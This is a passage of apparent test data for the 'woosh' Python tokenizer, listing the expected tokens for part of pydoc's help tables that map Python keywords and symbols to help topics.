woosh.Token(woosh.STRING, "'else'", 1831, 17, 1831, 23),
woosh.Token(woosh.OP, ',', 1831, 23, 1831, 24),
woosh.Token(woosh.STRING, "'while for'", 1831, 25, 1831, 36),
woosh.Token(woosh.OP, ')', 1831, 36, 1831, 37),
woosh.Token(woosh.OP, ',', 1831, 37, 1831, 38),
woosh.Token(woosh.STRING, "'except'", 1832, 8, 1832, 16),
woosh.Token(woosh.OP, ':', 1832, 16, 1832, 17),
woosh.Token(woosh.STRING, "'try'", 1832, 18, 1832, 23),
woosh.Token(woosh.OP, ',', 1832, 23, 1832, 24),
woosh.Token(woosh.STRING, "'finally'", 1833, 8, 1833, 17),
woosh.Token(woosh.OP, ':', 1833, 17, 1833, 18),
woosh.Token(woosh.STRING, "'try'", 1833, 19, 1833, 24),
woosh.Token(woosh.OP, ',', 1833, 24, 1833, 25),
woosh.Token(woosh.STRING, "'for'", 1834, 8, 1834, 13),
woosh.Token(woosh.OP, ':', 1834, 13, 1834, 14),
woosh.Token(woosh.OP, '(', 1834, 15, 1834, 16),
woosh.Token(woosh.STRING, "'for'", 1834, 16, 1834, 21),
woosh.Token(woosh.OP, ',', 1834, 21, 1834, 22),
woosh.Token(woosh.STRING, "'break continue while'", 1834, 23, 1834, 45),
woosh.Token(woosh.OP, ')', 1834, 45, 1834, 46),
woosh.Token(woosh.OP, ',', 1834, 46, 1834, 47),
woosh.Token(woosh.STRING, "'from'", 1835, 8, 1835, 14),
woosh.Token(woosh.OP, ':', 1835, 14, 1835, 15),
woosh.Token(woosh.STRING, "'import'", 1835, 16, 1835, 24),
woosh.Token(woosh.OP, ',', 1835, 24, 1835, 25),
woosh.Token(woosh.STRING, "'global'", 1836, 8, 1836, 16),
woosh.Token(woosh.OP, ':', 1836, 16, 1836, 17),
woosh.Token(woosh.OP, '(', 1836, 18, 1836, 19),
woosh.Token(woosh.STRING, "'global'", 1836, 19, 1836, 27),
woosh.Token(woosh.OP, ',', 1836, 27, 1836, 28),
woosh.Token(woosh.STRING, "'nonlocal NAMESPACES'", 1836, 29, 1836, 50),
woosh.Token(woosh.OP, ')', 1836, 50, 1836, 51),
woosh.Token(woosh.OP, ',', 1836, 51, 1836, 52),
woosh.Token(woosh.STRING, "'if'", 1837, 8, 1837, 12),
woosh.Token(woosh.OP, ':', 1837, 12, 1837, 13),
woosh.Token(woosh.OP, '(', 1837, 14, 1837, 15),
woosh.Token(woosh.STRING, "'if'", 1837, 15, 1837, 19),
woosh.Token(woosh.OP, ',', 1837, 19, 1837, 20),
woosh.Token(woosh.STRING, "'TRUTHVALUE'", 1837, 21, 1837, 33),
woosh.Token(woosh.OP, ')', 1837, 33, 1837, 34),
woosh.Token(woosh.OP, ',', 1837, 34, 1837, 35),
woosh.Token(woosh.STRING, "'import'", 1838, 8, 1838, 16),
woosh.Token(woosh.OP, ':', 1838, 16, 1838, 17),
woosh.Token(woosh.OP, '(', 1838, 18, 1838, 19),
woosh.Token(woosh.STRING, "'import'", 1838, 19, 1838, 27),
woosh.Token(woosh.OP, ',', 1838, 27, 1838, 28),
woosh.Token(woosh.STRING, "'MODULES'", 1838, 29, 1838, 38),
woosh.Token(woosh.OP, ')', 1838, 38, 1838, 39),
woosh.Token(woosh.OP, ',', 1838, 39, 1838, 40),
woosh.Token(woosh.STRING, "'in'", 1839, 8, 1839, 12),
woosh.Token(woosh.OP, ':', 1839, 12, 1839, 13),
woosh.Token(woosh.OP, '(', 1839, 14, 1839, 15),
woosh.Token(woosh.STRING, "'in'", 1839, 15, 1839, 19),
woosh.Token(woosh.OP, ',', 1839, 19, 1839, 20),
woosh.Token(woosh.STRING, "'SEQUENCEMETHODS'", 1839, 21, 1839, 38),
woosh.Token(woosh.OP, ')', 1839, 38, 1839, 39),
woosh.Token(woosh.OP, ',', 1839, 39, 1839, 40),
woosh.Token(woosh.STRING, "'is'", 1840, 8, 1840, 12),
woosh.Token(woosh.OP, ':', 1840, 12, 1840, 13),
woosh.Token(woosh.STRING, "'COMPARISON'", 1840, 14, 1840, 26),
woosh.Token(woosh.OP, ',', 1840, 26, 1840, 27),
woosh.Token(woosh.STRING, "'lambda'", 1841, 8, 1841, 16),
woosh.Token(woosh.OP, ':', 1841, 16, 1841, 17),
woosh.Token(woosh.OP, '(', 1841, 18, 1841, 19),
woosh.Token(woosh.STRING, "'lambda'", 1841, 19, 1841, 27),
woosh.Token(woosh.OP, ',', 1841, 27, 1841, 28),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1841, 29, 1841, 40),
woosh.Token(woosh.OP, ')', 1841, 40, 1841, 41),
woosh.Token(woosh.OP, ',', 1841, 41, 1841, 42),
woosh.Token(woosh.STRING, "'nonlocal'", 1842, 8, 1842, 18),
woosh.Token(woosh.OP, ':', 1842, 18, 1842, 19),
woosh.Token(woosh.OP, '(', 1842, 20, 1842, 21),
woosh.Token(woosh.STRING, "'nonlocal'", 1842, 21, 1842, 31),
woosh.Token(woosh.OP, ',', 1842, 31, 1842, 32),
woosh.Token(woosh.STRING, "'global NAMESPACES'", 1842, 33, 1842, 52),
woosh.Token(woosh.OP, ')', 1842, 52, 1842, 53),
woosh.Token(woosh.OP, ',', 1842, 53, 1842, 54),
woosh.Token(woosh.STRING, "'not'", 1843, 8, 1843, 13),
woosh.Token(woosh.OP, ':', 1843, 13, 1843, 14),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1843, 15, 1843, 24),
woosh.Token(woosh.OP, ',', 1843, 24, 1843, 25),
woosh.Token(woosh.STRING, "'or'", 1844, 8, 1844, 12),
woosh.Token(woosh.OP, ':', 1844, 12, 1844, 13),
woosh.Token(woosh.STRING, "'BOOLEAN'", 1844, 14, 1844, 23),
woosh.Token(woosh.OP, ',', 1844, 23, 1844, 24),
woosh.Token(woosh.STRING, "'pass'", 1845, 8, 1845, 14),
woosh.Token(woosh.OP, ':', 1845, 14, 1845, 15),
woosh.Token(woosh.OP, '(', 1845, 16, 1845, 17),
woosh.Token(woosh.STRING, "'pass'", 1845, 17, 1845, 23),
woosh.Token(woosh.OP, ',', 1845, 23, 1845, 24),
woosh.Token(woosh.STRING, "''", 1845, 25, 1845, 27),
woosh.Token(woosh.OP, ')', 1845, 27, 1845, 28),
woosh.Token(woosh.OP, ',', 1845, 28, 1845, 29),
woosh.Token(woosh.STRING, "'raise'", 1846, 8, 1846, 15),
woosh.Token(woosh.OP, ':', 1846, 15, 1846, 16),
woosh.Token(woosh.OP, '(', 1846, 17, 1846, 18),
woosh.Token(woosh.STRING, "'raise'", 1846, 18, 1846, 25),
woosh.Token(woosh.OP, ',', 1846, 25, 1846, 26),
woosh.Token(woosh.STRING, "'EXCEPTIONS'", 1846, 27, 1846, 39),
woosh.Token(woosh.OP, ')', 1846, 39, 1846, 40),
woosh.Token(woosh.OP, ',', 1846, 40, 1846, 41),
woosh.Token(woosh.STRING, "'return'", 1847, 8, 1847, 16),
woosh.Token(woosh.OP, ':', 1847, 16, 1847, 17),
woosh.Token(woosh.OP, '(', 1847, 18, 1847, 19),
woosh.Token(woosh.STRING, "'return'", 1847, 19, 1847, 27),
woosh.Token(woosh.OP, ',', 1847, 27, 1847, 28),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1847, 29, 1847, 40),
woosh.Token(woosh.OP, ')', 1847, 40, 1847, 41),
woosh.Token(woosh.OP, ',', 1847, 41, 1847, 42),
woosh.Token(woosh.STRING, "'try'", 1848, 8, 1848, 13),
woosh.Token(woosh.OP, ':', 1848, 13, 1848, 14),
woosh.Token(woosh.OP, '(', 1848, 15, 1848, 16),
woosh.Token(woosh.STRING, "'try'", 1848, 16, 1848, 21),
woosh.Token(woosh.OP, ',', 1848, 21, 1848, 22),
woosh.Token(woosh.STRING, "'EXCEPTIONS'", 1848, 23, 1848, 35),
woosh.Token(woosh.OP, ')', 1848, 35, 1848, 36),
woosh.Token(woosh.OP, ',', 1848, 36, 1848, 37),
woosh.Token(woosh.STRING, "'while'", 1849, 8, 1849, 15),
woosh.Token(woosh.OP, ':', 1849, 15, 1849, 16),
woosh.Token(woosh.OP, '(', 1849, 17, 1849, 18),
woosh.Token(woosh.STRING, "'while'", 1849, 18, 1849, 25),
woosh.Token(woosh.OP, ',', 1849, 25, 1849, 26),
woosh.Token(woosh.STRING, "'break continue if TRUTHVALUE'", 1849, 27, 1849, 57),
woosh.Token(woosh.OP, ')', 1849, 57, 1849, 58),
woosh.Token(woosh.OP, ',', 1849, 58, 1849, 59),
woosh.Token(woosh.STRING, "'with'", 1850, 8, 1850, 14),
woosh.Token(woosh.OP, ':', 1850, 14, 1850, 15),
woosh.Token(woosh.OP, '(', 1850, 16, 1850, 17),
woosh.Token(woosh.STRING, "'with'", 1850, 17, 1850, 23),
woosh.Token(woosh.OP, ',', 1850, 23, 1850, 24),
woosh.Token(woosh.STRING, "'CONTEXTMANAGERS EXCEPTIONS yield'", 1850, 25, 1850, 59),
woosh.Token(woosh.OP, ')', 1850, 59, 1850, 60),
woosh.Token(woosh.OP, ',', 1850, 60, 1850, 61),
woosh.Token(woosh.STRING, "'yield'", 1851, 8, 1851, 15),
woosh.Token(woosh.OP, ':', 1851, 15, 1851, 16),
woosh.Token(woosh.OP, '(', 1851, 17, 1851, 18),
woosh.Token(woosh.STRING, "'yield'", 1851, 18, 1851, 25),
woosh.Token(woosh.OP, ',', 1851, 25, 1851, 26),
woosh.Token(woosh.STRING, "''", 1851, 27, 1851, 29),
woosh.Token(woosh.OP, ')', 1851, 29, 1851, 30),
woosh.Token(woosh.OP, ',', 1851, 30, 1851, 31),
woosh.Token(woosh.OP, '}', 1852, 4, 1852, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1852, 5, 1853, 0),
woosh.Token(woosh.COMMENT, '# Either add symbols to this dictionary or to the symbols dictionary', 1853, 4, 1853, 72),
woosh.Token(woosh.COMMENT, '# directly: Whichever is easier. They are merged later.', 1854, 4, 1854, 59),
woosh.Token(woosh.NAME, '_strprefixes', 1855, 4, 1855, 16),
woosh.Token(woosh.OP, '=', 1855, 17, 1855, 18),
woosh.Token(woosh.OP, '[', 1855, 19, 1855, 20),
woosh.Token(woosh.NAME, 'p', 1855, 20, 1855, 21),
woosh.Token(woosh.OP, '+', 1855, 22, 1855, 23),
woosh.Token(woosh.NAME, 'q', 1855, 24, 1855, 25),
woosh.Token(woosh.NAME, 'for', 1855, 26, 1855, 29),
woosh.Token(woosh.NAME, 'p', 1855, 30, 1855, 31),
woosh.Token(woosh.NAME, 'in', 1855, 32, 1855, 34),
woosh.Token(woosh.OP, '(', 1855, 35, 1855, 36),
woosh.Token(woosh.STRING, "'b'", 1855, 36, 1855, 39),
woosh.Token(woosh.OP, ',', 1855, 39, 1855, 40),
woosh.Token(woosh.STRING, "'f'", 1855, 41, 1855, 44),
woosh.Token(woosh.OP, ',', 1855, 44, 1855, 45),
woosh.Token(woosh.STRING, "'r'", 1855, 46, 1855, 49),
woosh.Token(woosh.OP, ',', 1855, 49, 1855, 50),
woosh.Token(woosh.STRING, "'u'", 1855, 51, 1855, 54),
woosh.Token(woosh.OP, ')', 1855, 54, 1855, 55),
woosh.Token(woosh.NAME, 'for', 1855, 56, 1855, 59),
woosh.Token(woosh.NAME, 'q', 1855, 60, 1855, 61),
woosh.Token(woosh.NAME, 'in', 1855, 62, 1855, 64),
woosh.Token(woosh.OP, '(', 1855, 65, 1855, 66),
woosh.Token(woosh.STRING, '"\'"', 1855, 66, 1855, 69),
woosh.Token(woosh.OP, ',', 1855, 69, 1855, 70),
woosh.Token(woosh.STRING, '\'"\'', 1855, 71, 1855, 74),
woosh.Token(woosh.OP, ')', 1855, 74, 1855, 75),
woosh.Token(woosh.OP, ']', 1855, 75, 1855, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1855, 76, 1856, 0),
woosh.Token(woosh.NAME, '_symbols_inverse', 1856, 4, 1856, 20),
woosh.Token(woosh.OP, '=', 1856, 21, 1856, 22),
woosh.Token(woosh.OP, '{', 1856, 23, 1856, 24),
woosh.Token(woosh.STRING, "'STRINGS'", 1857, 8, 1857, 17),
woosh.Token(woosh.OP, ':', 1857, 18, 1857, 19),
woosh.Token(woosh.OP, '(', 1857, 20, 1857, 21),
woosh.Token(woosh.STRING, '"\'"', 1857, 21, 1857, 24),
woosh.Token(woosh.OP, ',', 1857, 24, 1857, 25),
woosh.Token(woosh.STRING, '"\'\'\'"', 1857, 26, 1857, 31),
woosh.Token(woosh.OP, ',', 1857, 31, 1857, 32),
woosh.Token(woosh.STRING, '\'"\'', 1857, 33, 1857, 36),
woosh.Token(woosh.OP, ',', 1857, 36, 1857, 37),
woosh.Token(woosh.STRING, '\'"""\'', 1857, 38, 1857, 43),
woosh.Token(woosh.OP, ',', 1857, 43, 1857, 44),
woosh.Token(woosh.OP, '*', 1857, 45, 1857, 46),
woosh.Token(woosh.NAME, '_strprefixes', 1857, 46, 1857, 58),
woosh.Token(woosh.OP, ')', 1857, 58, 1857, 59),
woosh.Token(woosh.OP, ',', 1857, 59, 1857, 60),
woosh.Token(woosh.STRING, "'OPERATORS'", 1858, 8, 1858, 19),
woosh.Token(woosh.OP, ':', 1858, 20, 1858, 21),
woosh.Token(woosh.OP, '(', 1858, 22, 1858, 23),
woosh.Token(woosh.STRING, "'+'", 1858, 23, 1858, 26),
woosh.Token(woosh.OP, ',', 1858, 26, 1858, 27),
woosh.Token(woosh.STRING, "'-'", 1858, 28, 1858, 31),
woosh.Token(woosh.OP, ',', 1858, 31, 1858, 32),
woosh.Token(woosh.STRING, "'*'", 1858, 33, 1858, 36),
woosh.Token(woosh.OP, ',', 1858, 36, 1858, 37),
woosh.Token(woosh.STRING, "'**'", 1858, 38, 1858, 42),
woosh.Token(woosh.OP, ',', 1858, 42, 1858, 43),
woosh.Token(woosh.STRING, "'/'", 1858, 44, 1858, 47),
woosh.Token(woosh.OP, ',', 1858, 47, 1858, 48),
woosh.Token(woosh.STRING, "'//'", 1858, 49, 1858, 53),
woosh.Token(woosh.OP, ',', 1858, 53, 1858, 54),
woosh.Token(woosh.STRING, "'%'", 1858, 55, 1858, 58),
woosh.Token(woosh.OP, ',', 1858, 58, 1858, 59),
woosh.Token(woosh.STRING, "'<<'", 1858, 60, 1858, 64),
woosh.Token(woosh.OP, ',', 1858, 64, 1858, 65),
woosh.Token(woosh.STRING, "'>>'", 1858, 66, 1858, 70),
woosh.Token(woosh.OP, ',', 1858, 70, 1858, 71),
woosh.Token(woosh.STRING, "'&'", 1858, 72, 1858, 75),
woosh.Token(woosh.OP, ',', 1858, 75, 1858, 76),
woosh.Token(woosh.STRING, "'|'", 1859, 23, 1859, 26),
woosh.Token(woosh.OP, ',', 1859, 26, 1859, 27),
woosh.Token(woosh.STRING, "'^'", 1859, 28, 1859, 31),
woosh.Token(woosh.OP, ',', 1859, 31, 1859, 32),
woosh.Token(woosh.STRING, "'~'", 1859, 33, 1859, 36),
woosh.Token(woosh.OP, ',', 1859, 36, 1859, 37),
woosh.Token(woosh.STRING, "'<'", 1859, 38, 1859, 41),
woosh.Token(woosh.OP, ',', 1859, 41, 1859, 42),
woosh.Token(woosh.STRING, "'>'", 1859, 43, 1859, 46),
woosh.Token(woosh.OP, ',', 1859, 46, 1859, 47),
woosh.Token(woosh.STRING, "'<='", 1859, 48, 1859, 52),
woosh.Token(woosh.OP, ',', 1859, 52, 1859, 53),
woosh.Token(woosh.STRING, "'>='", 1859, 54, 1859, 58),
woosh.Token(woosh.OP, ',', 1859, 58, 1859, 59),
woosh.Token(woosh.STRING, "'=='", 1859, 60, 1859, 64),
woosh.Token(woosh.OP, ',', 1859, 64, 1859, 65),
woosh.Token(woosh.STRING, "'!='", 1859, 66, 1859, 70),
woosh.Token(woosh.OP, ',', 1859, 70, 1859, 71),
woosh.Token(woosh.STRING, "'<>'", 1859, 72, 1859, 76),
woosh.Token(woosh.OP, ')', 1859, 76, 1859, 77),
woosh.Token(woosh.OP, ',', 1859, 77, 1859, 78),
woosh.Token(woosh.STRING, "'COMPARISON'", 1860, 8, 1860, 20),
woosh.Token(woosh.OP, ':', 1860, 21, 1860, 22),
woosh.Token(woosh.OP, '(', 1860, 23, 1860, 24),
woosh.Token(woosh.STRING, "'<'", 1860, 24, 1860, 27),
woosh.Token(woosh.OP, ',', 1860, 27, 1860, 28),
woosh.Token(woosh.STRING, "'>'", 1860, 29, 1860, 32),
woosh.Token(woosh.OP, ',', 1860, 32, 1860, 33),
woosh.Token(woosh.STRING, "'<='", 1860, 34, 1860, 38),
woosh.Token(woosh.OP, ',', 1860, 38, 1860, 39),
woosh.Token(woosh.STRING, "'>='", 1860, 40, 1860, 44),
woosh.Token(woosh.OP, ',', 1860, 44, 1860, 45),
woosh.Token(woosh.STRING, "'=='", 1860, 46, 1860, 50),
woosh.Token(woosh.OP, ',', 1860, 50, 1860, 51),
woosh.Token(woosh.STRING, "'!='", 1860, 52, 1860, 56),
woosh.Token(woosh.OP, ',', 1860, 56, 1860, 57),
woosh.Token(woosh.STRING, "'<>'", 1860, 58, 1860, 62),
woosh.Token(woosh.OP, ')', 1860, 62, 1860, 63),
woosh.Token(woosh.OP, ',', 1860, 63, 1860, 64),
woosh.Token(woosh.STRING, "'UNARY'", 1861, 8, 1861, 15),
woosh.Token(woosh.OP, ':', 1861, 16, 1861, 17),
woosh.Token(woosh.OP, '(', 1861, 18, 1861, 19),
woosh.Token(woosh.STRING, "'-'", 1861, 19, 1861, 22),
woosh.Token(woosh.OP, ',', 1861, 22, 1861, 23),
woosh.Token(woosh.STRING, "'~'", 1861, 24, 1861, 27),
woosh.Token(woosh.OP, ')', 1861, 27, 1861, 28),
woosh.Token(woosh.OP, ',', 1861, 28, 1861, 29),
woosh.Token(woosh.STRING, "'AUGMENTEDASSIGNMENT'", 1862, 8, 1862, 29),
woosh.Token(woosh.OP, ':', 1862, 30, 1862, 31),
woosh.Token(woosh.OP, '(', 1862, 32, 1862, 33),
woosh.Token(woosh.STRING, "'+='", 1862, 33, 1862, 37),
woosh.Token(woosh.OP, ',', 1862, 37, 1862, 38),
woosh.Token(woosh.STRING, "'-='", 1862, 39, 1862, 43),
woosh.Token(woosh.OP, ',', 1862, 43, 1862, 44),
woosh.Token(woosh.STRING, "'*='", 1862, 45, 1862, 49),
woosh.Token(woosh.OP, ',', 1862, 49, 1862, 50),
woosh.Token(woosh.STRING, "'/='", 1862, 51, 1862, 55),
woosh.Token(woosh.OP, ',', 1862, 55, 1862, 56),
woosh.Token(woosh.STRING, "'%='", 1862, 57, 1862, 61),
woosh.Token(woosh.OP, ',', 1862, 61, 1862, 62),
woosh.Token(woosh.STRING, "'&='", 1862, 63, 1862, 67),
woosh.Token(woosh.OP, ',', 1862, 67, 1862, 68),
woosh.Token(woosh.STRING, "'|='", 1862, 69, 1862, 73),
woosh.Token(woosh.OP, ',', 1862, 73, 1862, 74),
woosh.Token(woosh.STRING, "'^='", 1863, 32, 1863, 36),
woosh.Token(woosh.OP, ',', 1863, 36, 1863, 37),
woosh.Token(woosh.STRING, "'<<='", 1863, 38, 1863, 43),
woosh.Token(woosh.OP, ',', 1863, 43, 1863, 44),
woosh.Token(woosh.STRING, "'>>='", 1863, 45, 1863, 50),
woosh.Token(woosh.OP, ',', 1863, 50, 1863, 51),
woosh.Token(woosh.STRING, "'**='", 1863, 52, 1863, 57),
woosh.Token(woosh.OP, ',', 1863, 57, 1863, 58),
woosh.Token(woosh.STRING, "'//='", 1863, 59, 1863, 64),
woosh.Token(woosh.OP, ')', 1863, 64, 1863, 65),
woosh.Token(woosh.OP, ',', 1863, 65, 1863, 66),
woosh.Token(woosh.STRING, "'BITWISE'", 1864, 8, 1864, 17),
woosh.Token(woosh.OP, ':', 1864, 18, 1864, 19),
woosh.Token(woosh.OP, '(', 1864, 20, 1864, 21),
woosh.Token(woosh.STRING, "'<<'", 1864, 21, 1864, 25),
woosh.Token(woosh.OP, ',', 1864, 25, 1864, 26),
woosh.Token(woosh.STRING, "'>>'", 1864, 27, 1864, 31),
woosh.Token(woosh.OP, ',', 1864, 31, 1864, 32),
woosh.Token(woosh.STRING, "'&'", 1864, 33, 1864, 36),
woosh.Token(woosh.OP, ',', 1864, 36, 1864, 37),
woosh.Token(woosh.STRING, "'|'", 1864, 38, 1864, 41),
woosh.Token(woosh.OP, ',', 1864, 41, 1864, 42),
woosh.Token(woosh.STRING, "'^'", 1864, 43, 1864, 46),
woosh.Token(woosh.OP, ',', 1864, 46, 1864, 47),
woosh.Token(woosh.STRING, "'~'", 1864, 48, 1864, 51),
woosh.Token(woosh.OP, ')', 1864, 51, 1864, 52),
woosh.Token(woosh.OP, ',', 1864, 52, 1864, 53),
woosh.Token(woosh.STRING, "'COMPLEX'", 1865, 8, 1865, 17),
woosh.Token(woosh.OP, ':', 1865, 18, 1865, 19),
woosh.Token(woosh.OP, '(', 1865, 20, 1865, 21),
woosh.Token(woosh.STRING, "'j'", 1865, 21, 1865, 24),
woosh.Token(woosh.OP, ',', 1865, 24, 1865, 25),
woosh.Token(woosh.STRING, "'J'", 1865, 26, 1865, 29),
woosh.Token(woosh.OP, ')', 1865, 29, 1865, 30),
woosh.Token(woosh.OP, '}', 1866, 4, 1866, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1866, 5, 1867, 0),
woosh.Token(woosh.NAME, 'symbols', 1867, 4, 1867, 11),
woosh.Token(woosh.OP, '=', 1867, 12, 1867, 13),
woosh.Token(woosh.OP, '{', 1867, 14, 1867, 15),
woosh.Token(woosh.STRING, "'%'", 1868, 8, 1868, 11),
woosh.Token(woosh.OP, ':', 1868, 11, 1868, 12),
woosh.Token(woosh.STRING, "'OPERATORS FORMATTING'", 1868, 13, 1868, 35),
woosh.Token(woosh.OP, ',', 1868, 35, 1868, 36),
woosh.Token(woosh.STRING, "'**'", 1869, 8, 1869, 12),
woosh.Token(woosh.OP, ':', 1869, 12, 1869, 13),
woosh.Token(woosh.STRING, "'POWER'", 1869, 14, 1869, 21),
woosh.Token(woosh.OP, ',', 1869, 21, 1869, 22),
woosh.Token(woosh.STRING, "','", 1870, 8, 1870, 11),
woosh.Token(woosh.OP, ':', 1870, 11, 1870, 12),
woosh.Token(woosh.STRING, "'TUPLES LISTS FUNCTIONS'", 1870, 13, 1870, 37),
woosh.Token(woosh.OP, ',', 1870, 37, 1870, 38),
woosh.Token(woosh.STRING, "'.'", 1871, 8, 1871, 11),
woosh.Token(woosh.OP, ':', 1871, 11, 1871, 12),
woosh.Token(woosh.STRING, "'ATTRIBUTES FLOAT MODULES OBJECTS'", 1871, 13, 1871, 47),
woosh.Token(woosh.OP, ',', 1871, 47, 1871, 48),
woosh.Token(woosh.STRING, "'...'", 1872, 8, 1872, 13),
woosh.Token(woosh.OP, ':', 1872, 13, 1872, 14),
woosh.Token(woosh.STRING, "'ELLIPSIS'", 1872, 15, 1872, 25),
woosh.Token(woosh.OP, ',', 1872, 25, 1872, 26),
woosh.Token(woosh.STRING, "':'", 1873, 8, 1873, 11),
woosh.Token(woosh.OP, ':', 1873, 11, 1873, 12),
woosh.Token(woosh.STRING, "'SLICINGS DICTIONARYLITERALS'", 1873, 13, 1873, 42),
woosh.Token(woosh.OP, ',', 1873, 42, 1873, 43),
woosh.Token(woosh.STRING, "'@'", 1874, 8, 1874, 11),
woosh.Token(woosh.OP, ':', 1874, 11, 1874, 12),
woosh.Token(woosh.STRING, "'def class'", 1874, 13, 1874, 24),
woosh.Token(woosh.OP, ',', 1874, 24, 1874, 25),
woosh.Token(woosh.STRING, "'\\\\'", 1875, 8, 1875, 12),
woosh.Token(woosh.OP, ':', 1875, 12, 1875, 13),
woosh.Token(woosh.STRING, "'STRINGS'", 1875, 14, 1875, 23),
woosh.Token(woosh.OP, ',', 1875, 23, 1875, 24),
woosh.Token(woosh.STRING, "'_'", 1876, 8, 1876, 11),
woosh.Token(woosh.OP, ':', 1876, 11, 1876, 12),
woosh.Token(woosh.STRING, "'PRIVATENAMES'", 1876, 13, 1876, 27),
woosh.Token(woosh.OP, ',', 1876, 27, 1876, 28),
woosh.Token(woosh.STRING, "'__'", 1877, 8, 1877, 12),
woosh.Token(woosh.OP, ':', 1877, 12, 1877, 13),
woosh.Token(woosh.STRING, "'PRIVATENAMES SPECIALMETHODS'", 1877, 14, 1877, 43),
woosh.Token(woosh.OP, ',', 1877, 43, 1877, 44),
woosh.Token(woosh.STRING, "'`'", 1878, 8, 1878, 11),
woosh.Token(woosh.OP, ':', 1878, 11, 1878, 12),
woosh.Token(woosh.STRING, "'BACKQUOTES'", 1878, 13, 1878, 25),
woosh.Token(woosh.OP, ',', 1878, 25, 1878, 26),
woosh.Token(woosh.STRING, "'('", 1879, 8, 1879, 11),
woosh.Token(woosh.OP, ':', 1879, 11, 1879, 12),
woosh.Token(woosh.STRING, "'TUPLES FUNCTIONS CALLS'", 1879, 13, 1879, 37),
woosh.Token(woosh.OP, ',', 1879, 37, 1879, 38),
woosh.Token(woosh.STRING, "')'", 1880, 8, 1880, 11),
woosh.Token(woosh.OP, ':', 1880, 11, 1880, 12),
woosh.Token(woosh.STRING, "'TUPLES FUNCTIONS CALLS'", 1880, 13, 1880, 37),
woosh.Token(woosh.OP, ',', 1880, 37, 1880, 38),
woosh.Token(woosh.STRING, "'['", 1881, 8, 1881, 11),
woosh.Token(woosh.OP, ':', 1881, 11, 1881, 12),
woosh.Token(woosh.STRING, "'LISTS SUBSCRIPTS SLICINGS'", 1881, 13, 1881, 40),
woosh.Token(woosh.OP, ',', 1881, 40, 1881, 41),
woosh.Token(woosh.STRING, "']'", 1882, 8, 1882, 11),
woosh.Token(woosh.OP, ':', 1882, 11, 1882, 12),
woosh.Token(woosh.STRING, "'LISTS SUBSCRIPTS SLICINGS'", 1882, 13, 1882, 40),
woosh.Token(woosh.OP, '}', 1883, 4, 1883, 5),
woosh.Token(woosh.NEWLINE, '\r\n', 1883, 5, 1884, 0),
woosh.Token(woosh.NAME, 'for', 1884, 4, 1884, 7),
woosh.Token(woosh.NAME, 'topic', 1884, 8, 1884, 13),
woosh.Token(woosh.OP, ',', 1884, 13, 1884, 14),
woosh.Token(woosh.NAME, 'symbols_', 1884, 15, 1884, 23),
woosh.Token(woosh.NAME, 'in', 1884, 24, 1884, 26),
woosh.Token(woosh.NAME, '_symbols_inverse', 1884, 27, 1884, 43),
woosh.Token(woosh.OP, '.', 1884, 43, 1884, 44),
woosh.Token(woosh.NAME, 'items', 1884, 44, 1884, 49),
woosh.Token(woosh.OP, '(', 1884, 49, 1884, 50),
woosh.Token(woosh.OP, ')', 1884, 50, 1884, 51),
woosh.Token(woosh.OP, ':', 1884, 51, 1884, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1884, 52, 1885, 0),
woosh.Token(woosh.INDENT, ' ', 1885, 0, 1885, 8),
woosh.Token(woosh.NAME, 'for', 1885, 8, 1885, 11),
woosh.Token(woosh.NAME, 'symbol', 1885, 12, 1885, 18),
woosh.Token(woosh.NAME, 'in', 1885, 19, 1885, 21),
woosh.Token(woosh.NAME, 'symbols_', 1885, 22, 1885, 30),
woosh.Token(woosh.OP, ':', 1885, 30, 1885, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1885, 31, 1886, 0),
woosh.Token(woosh.INDENT, ' ', 1886, 0, 1886, 12),
woosh.Token(woosh.NAME, 'topics', 1886, 12, 1886, 18),
woosh.Token(woosh.OP, '=', 1886, 19, 1886, 20),
woosh.Token(woosh.NAME, 'symbols', 1886, 21, 1886, 28),
woosh.Token(woosh.OP, '.', 1886, 28, 1886, 29),
woosh.Token(woosh.NAME, 'get', 1886, 29, 1886, 32),
woosh.Token(woosh.OP, '(', 1886, 32, 1886, 33),
woosh.Token(woosh.NAME, 'symbol', 1886, 33, 1886, 39),
woosh.Token(woosh.OP, ',', 1886, 39, 1886, 40),
woosh.Token(woosh.NAME, 'topic', 1886, 41, 1886, 46),
woosh.Token(woosh.OP, ')', 1886, 46, 1886, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1886, 47, 1887, 0),
woosh.Token(woosh.NAME, 'if', 1887, 12, 1887, 14),
woosh.Token(woosh.NAME, 'topic', 1887, 15, 1887, 20),
woosh.Token(woosh.NAME, 'not', 1887, 21, 1887, 24),
woosh.Token(woosh.NAME, 'in', 1887, 25, 1887, 27),
woosh.Token(woosh.NAME, 'topics', 1887, 28, 1887, 34),
woosh.Token(woosh.OP, ':', 1887, 34, 1887, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1887, 35, 1888, 0),
woosh.Token(woosh.INDENT, ' ', 1888, 0, 1888, 16),
woosh.Token(woosh.NAME, 'topics', 1888, 16, 1888, 22),
woosh.Token(woosh.OP, '=', 1888, 23, 1888, 24),
woosh.Token(woosh.NAME, 'topics', 1888, 25, 1888, 31),
woosh.Token(woosh.OP, '+', 1888, 32, 1888, 33),
woosh.Token(woosh.STRING, "' '", 1888, 34, 1888, 37),
woosh.Token(woosh.OP, '+', 1888, 38, 1888, 39),
woosh.Token(woosh.NAME, 'topic', 1888, 40, 1888, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1888, 45, 1889, 0),
woosh.Token(woosh.DEDENT, ' ', 1889, 0, 1889, 12),
woosh.Token(woosh.NAME, 'symbols', 1889, 12, 1889, 19),
woosh.Token(woosh.OP, '[', 1889, 19, 1889, 20),
woosh.Token(woosh.NAME, 'symbol', 1889, 20, 1889, 26),
woosh.Token(woosh.OP, ']', 1889, 26, 1889, 27),
woosh.Token(woosh.OP, '=', 1889, 28, 1889, 29),
woosh.Token(woosh.NAME, 'topics', 1889, 30, 1889, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1889, 36, 1890, 0),
woosh.Token(woosh.DEDENT, ' ', 1891, 0, 1891, 4),
